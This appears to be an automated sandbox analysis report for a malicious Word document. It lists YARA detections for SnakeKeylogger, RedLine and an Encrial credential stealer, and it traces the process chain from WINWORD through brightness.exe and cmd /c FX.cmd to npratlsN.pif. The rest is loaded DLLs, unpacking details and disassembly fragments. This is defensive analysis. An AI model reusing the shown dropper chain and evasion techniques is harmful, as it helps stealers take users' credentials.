          Source: 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3047680567.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000008.00000002.3086497013.000000002B690000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000012.00000002.3047750977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000012.00000001.2046118520.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000001.1967244493.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000E.00000002.3095731527.0000000036F80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000E.00000002.3047709158.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: Process Memory Space: npratlsN.pif PID: 8112, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: npratlsN.pif PID: 3980, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: npratlsN.pif PID: 7692, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@24/10@6/7
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02907F52 GetDiskFreeSpaceA,4_2_02907F52
          Source: C:\Users\Public\Libraries\npratlsN.pifCode function: 8_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,8_2_004019F0
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02916D48 CoCreateInstance,4_2_02916D48
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ ITS15235.doc
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
          Source: C:\Users\Public\Libraries\npratlsN.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8068:120:WilError_03
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{A4D78E82-8112-4A1D-9379-4990DA8275A1} - OProcSessId.dat
          Source: PI ITS15235.docOLE indicator, Word Document stream: true
          Source: PI ITS15235.docOLE document summary: title field not present or empty
          Source: PI ITS15235.docOLE document summary: edited time not present or 0
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A8_2_00413780
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A8_1_00413780
          Source: C:\Users\Public\Libraries\npratlsN.pifCommand line argument: 08A14_2_00413780
          Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
          Source: C:\Windows\SysWOW64\brightness.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Nsltarpn.PIF "C:\Users\Public\Libraries\Nsltarpn.PIF"
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Windows\SysWOW64\brightness.exeProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFProcess created: C:\Users\Public\Libraries\npratlsN.pif C:\Users\Public\Libraries\npratlsN.pif
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: version.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: uxtheme.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: url.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieframe.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iertutil.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netapi32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: userenv.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winhttp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wkscli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: netutils.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: amsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: smartscreenps.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: kernel.appcore.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winmm.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wininet.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sspicli.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: windows.storage.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: wldp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: profapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ieproxy.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: msasn1.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mssip32.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: mswsock.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: iphlpapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: winnsi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: am.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: sppc.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ??l.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ?.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: ???e???????????.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: tquery.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: cryptdll.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: spp.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vssapi.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: vsstrace.dll
          Source: C:\Users\Public\Libraries\Nsltarpn.PIFSection loaded: endpointdlp.dll
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
          Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: brightness.exe, 00000004.00000003.1846584384.000000007F3E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1897857234.000000002152E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.000000002066B000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1899562478.000000007F0CF000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.000000002057D000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2005809336.0000000020EF0000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1964311018.0000000000661000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: _.pdb source: npratlsN.pif, 00000008.00000002.3076004396.00000000288E0000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000008.00000003.1855758823.0000000026ADE000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000002.3074954074.0000000028629000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1973945813.0000000032410000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3081475034.0000000033F69000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 0000000E.00000002.3094890159.0000000036830000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 0000000E.00000003.1976468099.0000000032464000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3075258265.00000000206B9000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000002.3087171280.0000000022E20000.00000004.08000000.00040000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2072252048.000000001EAD6000.00000004.00000020.00020000.00000000.sdmp, npratlsN.pif, 00000012.00000003.2053786801.000000001EA7E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: brightness.exe, 00000004.00000002.1894871858.00000000205E0000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.0000000021501000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1847028273.00000000214D2000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000004.00000002.1894871858.0000000020649000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000004.00000003.1846070015.000000007F410000.00000004.00001000.00020000.00000000.sdmp, npratlsN.pif, 00000008.00000001.1851558247.0000000000690000.00000040.00000001.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.0000000020508000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000691000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000003.1963965217.0000000000662000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000B.00000002.2003282556.00000000204B0000.00000004.00001000.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, Nsltarpn.PIF, 0000000F.00000003.2043487630.00000000005F7000.00000004.00000020.00020000.00000000.sdmp

          Data Obfuscation

          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 8.2.npratlsN.pif.400000.2.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 14.2.npratlsN.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 18.2.npratlsN.pif.400000.1.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 8.2.npratlsN.pif.400000.2.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 14.2.npratlsN.pif.400000.1.unpack
          Source: C:\Users\Public\Libraries\npratlsN.pifUnpacked PE file: 18.2.npratlsN.pif.400000.1.unpack
          Source: Yara matchFile source: 4.2.brightness.exe.22765a8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.brightness.exe.22765a8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.brightness.exe.2900000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000E.00000002.3047709158.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1900364042.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000001.2046118520.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.1854703375.0000000002276000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.3047750977.0000000000BE0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000001.1967244493.0000000000BE0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
          Source: 8.3.npratlsN.pif.26ade320.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.2b690000.7.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.288e0ee8.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 8.2.npratlsN.pif.2866a8ee.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.36830ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.36f80000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: 14.2.npratlsN.pif.33faa8ee.3.raw.unpack, WP6RZJql8gZrNhVA9v.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
          Source: npratlsN.pif.4.drStatic PE information: 0x7BBD3E91 [Sun Oct 14 18:38:09 2035 UTC]
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918798 LoadLibraryW,GetProcAddress,FreeLibrary,4_2_02918798
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029032FC push eax; ret 4_2_02903338
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D2FC push 0292D367h; ret 4_2_0292D35F
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290635A push 029063B7h; ret 4_2_029063AF
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290635C push 029063B7h; ret 4_2_029063AF
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D0AC push 0292D125h; ret 4_2_0292D11D
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D1F8 push 0292D288h; ret 4_2_0292D280
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0292D144 push 0292D1ECh; ret 4_2_0292D1E4
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029186B8 push 029186FAh; ret 4_2_029186F2
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02906736 push 0290677Ah; ret 4_2_02906772
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02906738 push 0290677Ah; ret 4_2_02906772
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290C4EC push ecx; mov dword ptr [esp], edx4_2_0290C4F1
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290D520 push 0290D54Ch; ret 4_2_0290D544
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290CB6C push 0290CCF2h; ret 4_2_0290CCEA
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291788C push 02917909h; ret 4_2_02917901
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029168C6 push 02916973h; ret 4_2_0291696B
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_029168C8 push 02916973h; ret 4_2_0291696B
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0290C9CE push 0290CCF2h; ret 4_2_0290CCEA
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_0291E9E8 push ecx; mov dword ptr [esp], edx4_2_0291E9ED
          Source: C:\Windows\SysWOW64\brightness.exeCode function: 4_2_02918910 push 02918948h; ret 4_2_02918940
